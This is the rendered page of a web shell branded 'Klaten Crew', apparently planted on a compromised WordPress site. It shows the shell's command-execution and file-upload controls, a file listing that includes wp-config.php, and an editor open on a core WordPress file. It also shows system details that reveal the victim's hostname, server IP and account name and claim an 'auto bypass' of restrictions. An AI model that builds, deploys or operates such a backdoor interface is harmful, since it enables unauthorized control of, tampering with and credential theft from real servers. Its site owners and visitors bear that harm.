HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.0
System Info
HOME
home
ipifapor
proagricultura.ipifap.org
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-30 17:04:30
-
.well-known
Folder
-
0755
2022-12-14 06:30:33
.wp-cli
Folder
-
0755
2023-09-19 09:07:14
cgi-bin
Folder
-
0755
2022-12-14 06:29:42
wp-admin
Folder
-
0755
2026-06-14 10:16:53
wp-content
Folder
-
0755
2026-07-30 06:57:35
wp-includes
Folder
-
0755
2026-07-17 19:07:09
.htaccess
File
842 B
0644
2026-07-24 10:05:59
error_log
File
9.29 KB
0644
2026-07-28 17:39:00
index.php
File
405 B
0644
2020-02-06 17:03:12
license.txt
File
19.44 KB
0644
2026-05-21 14:46:54
readme.html
File
7.23 KB
0644
2026-07-17 19:07:09
wp-activate.php
File
7.2 KB
0644
2026-05-21 14:46:54
wp-blog-header.php
File
435 B
0444
2026-06-14 10:16:56
wp-comments-post.php
File
2.27 KB
0644
2023-08-16 03:52:07
wp-config-sample.php
File
3.26 KB
0644
2025-12-03 03:49:33
wp-config.php
File
3.13 KB
0644
2022-12-14 06:43:14
wp-cron.php
File
5.49 KB
0644
2024-11-13 18:55:46
wp-links-opml.php
File
2.43 KB
0644
2025-12-03 03:49:33
wp-load.php
File
3.84 KB
0644
2024-07-16 22:03:23
wp-login.php
File
50.63 KB
0644
2026-05-21 14:45:40
wp-mail.php
File
8.52 KB
0644
2025-12-03 03:48:49
wp-settings.php
File
31.88 KB
0644
2026-05-21 14:46:54
wp-signup.php
File
33.81 KB
0644
2026-05-21 14:45:40
wp-trackback.php
File
5.09 KB
0644
2025-12-03 03:49:33
xmlrpc.php
File
3.13 KB
0644
2025-04-16 00:05:03
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: wp-comments-post.php
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) { $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } header( 'Allow: POST' ); header( "$protocol 405 Method Not Allowed" ); header( 'Content-Type: text/plain' ); exit; } /** Sets up the WordPress Environment. */ require __DIR__ . '/wp-load.php'; nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = (int) $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( '<p>' . $comment->get_error_message() . '</p>', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Fires after comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.0 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED